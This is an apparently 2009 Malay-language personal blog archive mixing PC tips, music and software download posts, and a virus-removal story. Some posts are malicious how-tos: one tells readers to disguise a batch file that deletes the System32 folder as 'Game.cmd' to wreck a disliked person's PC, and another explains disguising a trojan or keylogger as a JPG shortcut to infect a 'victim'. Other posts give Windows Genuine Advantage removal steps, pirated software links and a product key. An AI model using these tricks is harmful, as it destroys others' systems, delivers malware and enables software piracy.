Saturday, May 9, 2009

virus loren

Kena Virus Loren may 06, '09 3:32 AM
for everyone

Hari Sabtu dan Minggu kelmarin, aku kena tepek kat dahi oleh virus loren.
Sialan nih virus bandel banget, sempat aku gak bisa tidur deh gara-gara virus ini.haha
mula2 nye aku pinjam laptop mmber aku and download , pastu trus aku simpan kat pendrive.
and what ???
pas waktu aku gi kat laptop aku, masukkan la pendrive tu kat USB,
aku tengok x da yang pelik-plik pun..macam biasa je.
Setengah jam lepas tu, ada bunyi dari speaker ....ngeeek ngeeek ngeeek.............
wah apa nih?
lepas tu aku restart and............. ting tong
ada kata mutiara saat starting up sebelum login ke windows.
Virus ni ciri-ciri die camni:
baca lagi...

1. Di start menu command “Run” dan “find” tidak keluar.
2. Folder c:\Windows nya jadi tidak keluar or x nmpak di explorer. hilang sudah. haha...
3. Selalu akan keluar je kata mutiara sebelum masuk windows.
4. Buat Pc and laptop jadi slow..
5. Membunuh Antivirus yang diinstall di pc or laptop


adoyai, aku carik ler antivirus software kat dlam external aku.. aku tukar kan antivirus..
masuk greek remover dan twister...trus install trojan remover versi terbaru.
pastu aku try ler scan ....

tengah-tengah scanning...
memory jadik penuh...hiksss....
sebb bnyk sgt instal AV..hehe (yang ini korang jgn tiru)

dah la tgh hari, perut lak x isi2 lagi..adoi...dapat lak masalah camni

last2 aku online semula tu, hajat nye nk cari solution ler kan...
lepas cari2 cara nk settle kan av ni.., aku terus kenal ngan sorang mamat ni.
namanya faiz, gaya nya macam da bese settle kan problem loren.
Mungkin jugak virus loren tu dari ip yang sama, pergh cibet tol loren ni...

faiz cakap cara dia cam ni :
- login di safe mode as administrator
- buka windows explorer
- taip di address bar : “c:\windows\system32\12053\”
and sampai disini kelihatan semua file2nya… (tp blom boley delete)
- klik kanan folder 12053 pilih rename (korang kena ingat name baru,
kalo aku, tambah je angka 1 menjadi 120531 )
- klik kanan folder windows, pilih properties, un-check hidden
- restart - ke safe mode lagi (sekarnag file2 virusnya dah x berfungsi,
tp masih ada… jadi hati2…
jgn sampai korang run file exe yg berukuran 216 KB,
kalo terlanjur dah run, ulangi langkah ini dari awal!!!
(sebb ni pengalaman peribadi aku..hehehe )
- buka windows explorer, klik kanan driver c:\
(menu search dah keluar… ) dan cari file *.exe
- delete semua file exe yang berukuran 216 yang iconnya = icon folder
- ulangi untuk driver yg lain….
- kalo dah settle, kembali ke windows explorer
taip “c:\windows\system32\120531? di address bar.
(atau ke nama folder yg korang rename tadi)
klik kanan, delete.
- sekarang gunakan program HijackThis, delete semua commant :arahan: yang
mengadungi 12053
- and beres deh…
- untuk dapat kan semula setting explorer, run, regedit, task manager
sila memperbaiki registry baca di http://www.vaksin.com/killav.htm
teringat virus ini mirip dengan virus KillAV
(ntah2 ni virus KillAV jugak )

Seperti yang dia tulis di sini

pastu aku balik la umah. Setelah ingat-ingat kan semula apa die cakap.
n aku try cara-cara yang dia berikan tapi kata mutiaranya tetap ada. walaupun virusnya dah mati.
dan laptop aku pn tetap jugk lembab, pakai memory 1.5gig terasa macam 512mb. weeww........
dah restart ulang kali pun... still ada kata mutiaranya..... dan laptop still agi slow...
Yang diserang oleh virus ni:
C:\Windows\EXPLORER.EXE


C:\Windows.exe


C:\WINDOWS\system32\12053


- 12053.exe

- Data.exe

- Data.zip

- Autoexec.bat

- Rose.jpg

- Rose.dll

- Msvbvm60.dll

C:\New Folder.exe [di setiap drive]

C:\rose.jpg

C:\Program Files\WinRAR\data.exe

C:\Private.zip [di setiap Drive], berisi file data.exe

C:\Documents and Settings\%User%\MyDocuments\myrose.html

C:\ Wndows\system

- Oeminfo.ini

- Oemlogo.bmp

Rose.icon


Aku pun contact faiz kat YM, dan tanya-tanya lagi ke dia,
adoi..malu sangat ni asyik-asyik muke aku je tnye..
nasib baik die ni jenis penyabar, pastu die pn bgtau la lagi.

Trus masuk lagi ke safe mode.
Ke Regedit
dan delete

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools


HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, LegalNoticeCaption


HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, LegalNoticeText


HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,DisableCurrentUserRun


HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoRun


HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFind


HKLM, Software\Microsoft\Windows\CurrentVersion\Run,RsWin


HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Winup


HKLM, softwARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regedit.exe


HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Msconfig.exe


HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe


HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ntvdm.exe


HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe


HKLM, Software\Microsoft\Command Processor,Autorun


HKLM, SOFTWARE\Classes\exefile,NeverShowExt

Setelah itu, gunakan Hijackthis dan buatkan file registry.bat

Itu adalah file induk yang di buat oleh virus loren.

Sekarang dah settle, virusnya dah hilang.............

tapi kenapa masih slow.............


Thx to faiz.




try la click sekali je..n just survey..click kat sini

make a virus to clean up system32

hai guys..arini aku nk explain pasal teknik untuk menjahanam kan pc member korang or jugak pc member korang yang mana berguna untuk merosakkan pc die..heh heh..
cara die simple je..korang juz ikut step kat bawah ni..

1- korang open note pad korang
2- write the above command :-
del c:\windows\system32\*.* /q

3. Save the above notepad with the extension ".bat or .cmd" yang mana yang korang nak
contoh nye Game.cmd or Mozilla firefox.bat
4. !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!! !!!
Jangan double click file tu kecuali korang dalam MASALAH!!.
Kenapa ?????? bcz file yang korang create tu akan mendelete semua file dari korang punya folder system32 dan bila korang restart pc..pc korang x kn berfungsi..senang cite x kn keluar windows..sebb system tidak menjumpa files didalam folder system32 yang mana diperlukan semasa pc booting..
5- korang juga boleh test cara diatas dengan membuat satu folder fake.
let suppose windows1 in c:\. copy beberapa file lama kedalam nya dan ikut arahan step diatas tadi.
dengan double click pada .bat atau .cmd file , file korang akan automatically get deleted
6- korang boleh cuba trick ni di mana-mana computer atau sesiapa punya komputer.(tetapi hasil nya akan
mendatang kan bahaya kepada pc tersebut..jadi fikir dahulu sebelum buat kat pc orang lain)
7- tapi!!kalau korang da benci kat orang tu..korang buat je..x yah pikir ape yang aku cakap kat no6 tadi..
hua hua hua..jahat nye aku..

selamat mencuba =)

korang nye pc rosak aku x tanggung..



try la click sekali je..n just survey..click kat sini

bila misya tersenyum


Ader jer yg tak kena..kalo orang len naek berjaya...
pkaian tak kena la, gaya jalan tak betol la..
suara kepit laa....terlampau SX laa...copy cat laa..
tak terlepas la artis sorang ni yg gaya senyuman ditegur bagai senyuman nek kebayan pkai pendakap gigi....

aper2 jela....
heh heh..dulu ingat lagi time kecik2 time skul..suka gak dok usya tgok misya ni kat tv..time tu lagu ape ntah yang femes nyer..tapi...sekarang..adoi..spoil betul la macam mne tengah google2 boleh terjumpa gambar ni,..hilang terus rasa minat kat die ..ekeke..rupa2 nya macam ni ler kamu yer misya..hua hua hua..korang layan je la
click to reveal Hidden Text






try la click sekali je..n just survey..click kat sini

BAGAI KAN DIRI KU TAPAK SULAIMAN



orang mesti pernah terjumpa prob ni aku rasa..antara kat laptop korang or kawan-kawan korang..so kat sini aku nk share WINDOWS GENUINE ADVANTAGE VALIDATION n jugak cara ni boleh digunakan untuk clean regestry bagi sape2 yang pakai windows fake..cam aku ni ke..hah hah..boleh meggunakan cara ni kalau laptop korang tu baru format,,dengan cara ni ..korang boleh buang tapak seleman tu dengan mudah dan tanpa gangguan lagi..heh heh..
bnyk tulis x guna buat letih mata je membaca..lebih baik korang usya je..
read more...


okok..kat ni cara 1st nk buang tanpa menggunakan software..senang cite. hacking..

1) Start -> Run -> taskkill /IM wgatray.exe

2) go to Windows\system32

3) rename LegitCheckControl.dll -> LegitCheckControl.dll.old

4) rename WgaLogon.dll -> WgaLogon.dll.old

5) rename WgaTray.exe -> WgaTray.exe.old

6) restart


tapi kalau laptop korang or pc korang da lame format baru die kua tapak sulaiman tu..korang


aku harap korang faham nk guna die..
kalau nk update tapak seleman, use the activation.
tapi kalau nk buang tapak seleman tu use the others. faham kan?
the others tu makne nye XP VISTA CRACK dan jugak Crack Windows Sp2 Update..

tapi..~~haha..da jugak..
okok..aku ada lagi satu software lain yang boleh jugak digunakan..cuma nama die lain ckit...nama software ni
WINDOWS GENUINE ADVANTAGE ALL-IN-ONE


dekat dalam tu ada txt file. so ada penerangan dalam tu..layanZ~~




try la click sekali je..n just survey..click kat sini

Friday, May 8, 2009

memasang flash tag cloud [tutorial update]

Flash tag cloud ialah Label yang diapaparkan secara animasi flash.




Cara memasangnya ke Blogger/Blogspot


+/-baca lagi


>Pada dashboard blog, pergi ke Layout>Edit HTML

>Cari code seperti di bawah (atau yg lebih kurang)
*gunakan key 'CTRL+F' dan taip sebahagian code dibawah untuk percepatkan proses mencari.

<b:section class='sidebar' id='sidebar' preferred='yes'>

Terus copy dan paste keseluruhan code di bawah ini, di bawah code yang anda cari tadi.
*sebelum copy, anda mungkin mahu teruskan baca dibawah untuk mengubah warna-warna tertentu.




Setelah paste, PREVIEW terlebih dahulu blog anda, jika FlashTagCloud muncul di sidebar anda, maka anda sedia untuk SAVE.

-------------------------------------------------------------------------
(untuk proses editing,anda boleh terus edit didalam kekotak code di atas)



Ubah ikut citarasa dan kesesuaian warna blog anda.
Secara default nya, setting FlashTagCloud ialah :

Lebar = 240px
Tinggi = 300px;
Background = white
Text = grey
Font size = "12"

Jika anda mahu ubah size supaya sesuai dengan saiz sidebar blog anda, ubah value yang bewarna di bawah.:
var so = new SWFObject("http://halotemplates.s3.amazonaws.com/wp-cumulus-example/tagcloud.swf", "tagcloud", "240", "300", "7", "#ffffff");

Jika anda mahu ubah warna background supaya sesuai dengan warna blog atau kesukaan anda, ubah value yang bewarna di bawah.:
var so = new SWFObject("http://halotemplates.s3.amazonaws.com/wp-cumulus-example/tagcloud.swf", "tagcloud", "240", "300", "7", "#ffffff");


OOO Anda Boleh Gunakan Tool Ini Untuk Membantu Anda Memilih Code Warna OOO

Jika anda mahu ubah warna text supaya sesuai dengan warna blog atau kesukaan anda, ubah value yang bewarna di bawah.:
*code warna dibawah tidak perlu gunaka simbul "#' dipermulaannya.

so.addVariable("tcolor", "0x333333");
#ffffff");
Jika anda mahu ubah saiz text supaya sesuai dengan warna blog atau kesukaan anda, ubah value yang bewarna di bawah.:

so.addVariable("tagcloud", "<tags><b:loop values='data:labels' var='label'><a expr:href='data:label.url' style='12'><data:label.name/></a></b:loop></tags>");


okok..itu saja..bye2..ada pertanyaan sila bertanya key,,
tutorial akan aku update malam karang..
>>>>>>>>>>>>>>>>>>UPDATE<<<<<<<<<<<<<<<<<< 1- korang buka layout, --->>edit template HTML, dan jangan lupa click pada kotak EXPAND WIDGET TEMPLATES
2- korang click CTRL+F untuk menyenangkan pencarian script anda nanti
3- korang paste script di bawah ke dalam kotak carian anda

<b:section class='sidebar' id='sidebar' preferred='yes'>

4- lepas jumpa script tu, korang paste plak script ni,
!--transparencyStart

5- bagi yang nk mengubah warna tulisan dan saiz tulisan, korang akan jumpa script dibawah ini dibelakang script diatas
so.addVariable("tcolor", "0x333333");
#ffffff");
6- Jika anda mahu ubah saiz text supaya sesuai dengan warna blog atau kesukaan anda, ubah value yang bewarna di bawah.
so.addVariable("tagcloud", "<tags><b:loop values='data:labels' var='label'><a expr:href='data:label.url' style='12'><data:label.name/></a></b:loop></tags>");
7- OOOanda boleh menggunakan widget disini sebagai rujukan warna bagi no yang anda sukaOOO

okok..aku harap tutorial ni dapat membantu bagi yang da siap tapi nk tukar semula x dapat, cite atas tu panjang2 je, sebenarnya, cara die click pada expand widget. n cari je kod script tu, ubah value yang kite nk , n terus settle..
ada apa2 sila tinggal kan komen anda terima kasih.

Butterfingers - Malayneum [2001] [Full Album]


Artist : Butterfingers
Album : Malayneum
Year : 2001

Track Listing
-------------
01. Butterfingers - Malayneum
02. Butterfingers - Antidotes
03. Butterfingers - Pretty Rain
04. Butterfingers - State Of Abyssmal
05. Butterfingers - Ginseng
06. Butterfingers - Am I Phoney
07. Butterfingers - Mating Season
08. Butterfingers - Pacific
09. Butterfingers - No One Else
10. Butterfingers - Suddenly
+/- click untuk link






credit to The AiOxen Mp3



try la click sekali je..n just survey..click kat sini

Butterfingers - Transcendence [1999] [full album]


Artist : Butterfingers
Album : Transcendence
Year : 1999

Track Listing
-------------
01. Butterfingers - The chemistry (Between us)
02. Butterfingers - Epitome
03. Butterfingers - Meltdown
04. Butterfingers - Mermaids
05. Butterfingers - Doomsday out
06. Butterfingers - Faculties of the mind
07. Butterfingers - Floating in a vacuum
08. Butterfingers - Weird
09. Butterfingers - RnR
10. Butterfingers - Mokhsha
11. Butterfingers - Mystery
12. Butterfingers - Words Vs Wisdom
+/- click untuk link download

link media fire



credit to The AiOxen Mp3



try la click sekali je..n just survey..click kat sini

Mawi ft KRU - Sujud





try la click sekali je..n just survey..click kat sini

Mp3 New Song

Pussycat Dolls - Jai Ho



Jesse McCartney - How Do You Sleep



Soulja Boy - Kiss Me Thru The Phone


Katy Perry - Thinking of You



try la click sekali je..n just survey..click kat sini

kolesi mp3

Ahaks..aku jumpe ni..cam x best sangat je..tapi pape pun layan la jugak..usya je la
click untuk link


try la click sekali je..n just survey..click kat sini

Total Video Converter 3.21[FuLL]



Total Solution for your Media Conversion

E.M. Total Video Converter is a piece of extremely powerful and full-featured converter software that supports almost all video and audio formats. The software is designed to convert video for your mobile video player as 3gp, mp4, PSP, PS3, iPod, iPhone etc and also VCD or DVD player, XBOX360.


E.M. Total Video Converter V3.2 New Features:

1 Multi-language GUI.
2 Integrate a free tool for capturing desktop to any formats video.
3 Support mpeg, h264, wmv multi-thread decoding and endcoding for Multi-core CPU;
4 Support watermark through Plugin while making conversion;
5 Support VirtualDub video filter plugin;
+/- baca lagi
Main Features of Total Video Converter:

* Convert all kinds of videos to mobile videos or audios (mp4, 3gp, xvid, divx mpeg4 avi, amr audio) which are used by cell-phone, PDA, PSP, iPod, iPhone, Xbox360, PS3 etc.;
* Photos slide show combines multi-photos and musics with more than 300 photos fantasy transition effect;
* High compatibility and high efficiency for Importing RMVB or RM video/audio;
* Convert various videos to MPEG videos compatible with standard DVD/SVCD/VCD;
* Burn the converted videos to DVD/SVCD/VCD;
* Rip DVD to popular videos of all sorts;
* Extract audio from various of videos and convert which to all kinds of audios (mp3, ac3, ogg, wav, aac);
* RIP CD to audios of all sorts directly;
* Support using with command line;
* Combine several video and audio files to one video file;
* Demultiplex or extract video and audio;
* Multiplex video and audio to one file;


http://rapidshare.com/files/226646110/Total_Video_Converter_3.21.090220.rar



try la click sekali je..n just survey..click kat sini

Play With Pictures v1.0.1



Combine Pictures and Effects to Create Amazing Images!
* Simple to use – 3 easy steps
* Cut out people and objects in seconds
* Share with friends and family

With Play With Pictures™, you can MAKE:
* Picture memories of holidays and special occasions
* Cards and invitations
* School assignments come alive
* Fun pictures to share with friends and family

+/- click untuk link download


try la click sekali je..n just survey..click kat sini

Power ISO PowerISO 4.3[FuLL]


Create, edit, extract, convert, compress, encrypt, mount CD,DVD image file!!!
PowerISO is a powerful image processing and file compression tool, which allows you to create, extract, compress, edit and convert ISO/BIN image files, and mount these files with internal virtual drive. And most of all, the compressed files can be used directly without decompressing.

• Support ISO, BIN, NRG, IMG, DAA, ...
• Open, Create, Edit, Extract ISO File...
• Compress, Encrypt, Split ISO File...
• Integrated with internal Virtual Drive...


+/-baca lagi

Main Features:
- Support almost all CD/DVD-ROM image file formats (ISO, BIN, NRG, IMG, DAA and so on).
Note: DAA (Direct-Access-Archive) is an advanced format for image file, which supports some advanced features, such as compression, password protection, and splitting to multiple volumes. It can be handled directly just like other formats, such as ISO, BIN, ...
- Supports on-the-fly burning.
- Supports UDF image file.
- Create image file from hard disk files or CD/DVD-ROM.
- Edit an existing image file.
- Can edit and burn Audio CD image file.
- Extract files and folders from image file.
- Convert image files between ISO/BIN and other formats.
- Make bootable image file, get boot information from bootable image file.
- Make floppy disk image file.
- Optimize files to save disk space while saving image files.
- Mount image file with internal virtual drive. Even if the image file is saved as DAA format, the virtual drive can handle that format directly.
- Support shell integration, such as context menu, Drag and Drop, clipboard...
- Supports command-line parameters.
- Can open XBOX image file.
- Supports multiple languages
- Supports Windows XP 64-bit Edition and Vista.

Changes in PowerISO 4.3 (Nov 6, 2008):
+) Support up to 23 virtual drives.
+) Can open Blu-Ray iso files.

Some minor bug fixes and improvements.http://rapidshare.com/files/225075564/Power_Iso_4.rar




try la click sekali je..n just survey..click kat sini

Replay Video Capture v3.0

Replay Video Capture is the best way to make production quality videos from hard-to-record sources, including:
* ANY Video Web Site, using ANY streaming protocol
* DVD's
* Webcam sites
* Powerpoint Presentations
* Skype Video calls
* Video Chat sessions
* And more!


+/-read more

Super-Easy to Use
Using Replay Video Capture is easy. Use the Get Window option to locate the video window (or mark it manually), then click Record to start.
Once you're recording, click Stop to end the recording, or Pause to pause and resume.

High Performance, High Quality, Small Files
With Replay Video Capture, you'll get amazing video quality, or compact portable files. You can choose between high-quality, high-speed MPEG-2 files, or smaller Windows Media (WMV) files.
Replay Video Capture's super-fast MPEG-2 codecs don't bog down your CPU, so you won't lose video frames or get choppy audio. These are preferred for high-motion video, or for use on slower PC's.
For the audio track, Replay Video Capture captures what you hear from your PC's speakers by default. Or, you can choose to narrate using the microphone instead, which is great for PowerPoint presentations and software demos.

System Requirements
* Windows XP or Vista
* PC with at least a 1.5 Ghz processor.




try la click sekali je..n just survey..click kat sini

Increase Broadband Speed Using Simple Tweak



ahah..aku baru dapat ni tapi aku x try lagi, sebb aku x da broadband..ekeke.. tapi aku share ngn korang sebb ramai antara korang yang menggunakan broadband ni sebab menda ni senang nak bawak , macam pendrive je..teknik ni dapat melajukan speed broadband korang..try la usya..

A Simple Tweak (XP Pro only) which will increase your Broadband Speed.
Make sure you Log on as Administrator, not as a user with Administrator privileges.
Follow the steps as given below-


+/- baca lagi


1) Click on Start Button.
2) Select Run From Start Menu.
3) Type gpedit.msc
4) Expand the [Administrative Templates] branch.
5) Then Expand the [Network] branch.
6) Highlight(Select by Single Click) [QoS Packet Scheduler]
7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)
8) Check(Select By Single Click on it) [Enabled]
9) Change [Bandwidth limit %] to 0 %
10) Click [OK] Button.
11) Restart Your PC.
12) Now Check Your Broadband Speed.




try la click sekali je..n just survey..click kat sini

Hide EXE File into JPG

This is a good trick to hide your exe files into a jpg file..!
How about sending a trojan or a keylogger into your victim using this trick..??

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.
+/- read more

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whateve you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-

'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-

%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.

This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.




try la click sekali je..n just survey..click kat sini

Hide Entire Drives Partition Without Registry

Ni adalah teknik yang agak cool yang mana sembunyi kan or "tapuk" kalau dalam bahasa sabah, menyembunyikan entire hard disk drives dengan cara or step yang agak simple.
cara ni adalah cara or tips terbaik untuk korang sembunyik kan daripada pengguna yang x dikenali guna latop or pc korang.

1) Go to Start > Run > type "diskpart". A DOS window will appear with following description.

DISKPART>

2) Then type "list volume" The result will look something like one as shown below-


+/-baca lagi

3) Suppose you want to hide drive E then type "select volume 3"

Then a message will appear in same window { Volume 3 is the selected volume}

4) sekarang type "remove letter E"

Dan messange akan keluar macam ni { Diskpart Removed the Drive letter }

Ada masa nya ia nya perlua di reboot.

Dan Diskpart akan remove the letter.

Windows XP is not having capabilty to identify the unknown volume.

Dan data korang sekarang da selamat daripada unauthorised users.

Untuk ada kan semula , sama macam step tadi cuma ulang sahaja. tapi , di step 4 " remove" by "assign".

Ini bermakna korang kena taip "assign letter E".




try la click sekali je..n just survey..click kat sini

Folder Options Missing




korang mesti pernah kena or akan kena menda ni kan, yang mana folder option korang hilang, so untuk ada kan semula folder option die, ada dua cara, but aku bg satu cara dulu untuk dapat kan semula folder option ..check it out~~
+/- baca selanjut nya

1- Open Run and then type "gpedit.msc".

2- Now goto User Configuration > Administrative templates > Windows Component > Windows Explorer.

3- Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu"

4- Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.




try la click sekali je..n just survey..click kat sini

Multiple login in yahoo Without Using any Software


You can login with multiple id's on the same yahoo messenger without any download or patch .
Follow these steps :

1. Go to Start ----> Run . Type regedit, then enter .

2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test

3.On the right page , right-click and choose new Dword value .


+/- baca lagi..
4.Rename it as Plural.

5.Double click and assign a decimal value of 1.


Its done!!
Now close registry and restart yahoo messenger and try Multiple Login


Note:- After these all Again Open Yahoo MSGNR and Login with different Yahoo ID and Password.

Source:- http://hack2007.50webs.com/Multiple%20login%20in%20yahoo.htm




try la click sekali je..n just survey..click kat sini

Thursday, May 7, 2009

Windows XP PRO SP3 Se7en Style with Superbar + SATA-Raid






***** Microsoft Windows XP PRO SP3 (32-bit) ******


- NO CD-KEY needed....Already integrated into setup.

- NO ACTIVATION needed...Already activated


PASSES ALL WGA CHECKS - FULLY UPDATEABLE !!!!!

BURN BOOTABLE .ISO AT VERY SLOW SPEED ( use your favorite Image burner- Nero, MagicISO, Alcohol, etc. ) ... AND INSTALL/BOOT FROM CD-ROM (not Desktop) !!!

DO NOT TRY TO UPGRADE YOUR EXISTING OPERATING SYSTEM WITH IT !!!!

A CLEAN INSTALL IS HIGHLY RECOMMENDED TO TAKE ADVANTADGE OF ALL FEATURES AND CONFIGURATIONS.




***** Based on the Windows XP SP3 RTM (Build 5512)...The untouched ISO straight from MSDN *****

==========================
+/- baca lagi


Whats's New !!!

* SUPERBAR - Windows 7 style !!!

* ALL UPDATES INTEGRATED UNTIL DECEMBER 22 2008
* Added 8 Vista Games
* Added 5 New Themes with 3-4 different Appearance
* Vista Drive Indicators

* more Vista-ish...and many more.


==========================

* DriverPack Chipset
* DriverPack CPU
* DriverPack LAN
* DriverPack MassStorage
* DriverPack WLAN

==========================

====================
Addons Integrated:
====================

- Vista RTM Boot screen
- SevenVG Refresh Theme ( default )
- Vista Aero Cursors Black ( default )
- Vista Sounds ( default )
- Vista Sidebar
- Vista RTM Fonts
- Vista SceenSavers
- Vista User Accounts pictures
- Windows 7 Logon screen
- Windows 7 Welcome/Shut Down screen
- Custom Backgrounds
- ToolBar Styler
- Clear Type Tuning
- LClock
- Image Resizer
- uTorrent v.1.8.1 (12639)
- Winamp Pro v.5.54 ( pre-activated )
- Rocket Dock v.1.3.5
- DAMN NFO Viewer
- CCleaner 2.14.763
- Unlocker 1.8.7
- Microsoft Power Toys (Power calculator, TweakUI)
- Right Click Image Converter 2.2.0 ( pre-activated )
- WinRAR 3.80 Registered with Vista themes
- Firefox 3.0.5
- Flash Player 10
- Internet Explorer 7 + hotfixes
- WMP 11 + hotfixes
- visual c++ 2005 sp1
- visualc++ 2008
- Java Runtime Environment 6 Update 11
- .NET Framework 1.1 sp1 + 2 sp2 + 3 sp2 + 3.5 sp1
- DirectX 9.0c End-User Runtime November 2008
- (KB905474) Windows Genuine Advantage Notifications ( WGA )


==================
What's removed:
==================

- Defragmenter
- Games
- Internet Games
- Pinball
- Screensavers
- Images and Backgrounds
- Mouse Cursors
- Music Samples
- Old CDPlayer and Sound Recorder
- MSN Explorer
- Windows Messenger
- Disk Cleanup
- Windows Tour

======================
Patches and Tweaks:
======================

- Increased TCPIP To 100 (default 10)
- Uxtheme Patch - Enable
- Set home page - Google.com
- Show Drive Letter in front of all drives - Enabled
- Taskbar-Disable Language-Bar
- Internet Explorer-Set Internet Explorer to accept 10 connects at a time

- .NET Framework is installed during setup @ T-13 min. It will take a while until it's done, but don't worry, the setup doesn't freeze.

enjoy...


Serial tak perlu, sebab installer jenis unattended, tapi just in case ..
V2C47 MK7JD 3R89F D2KXW VPK3J








try la click sekali je..n just survey..click kat sini

Archive

x

© 1989-2010 . Powered by R.O.T.S.

kerabatchieko by CHIeKO IeM0cHI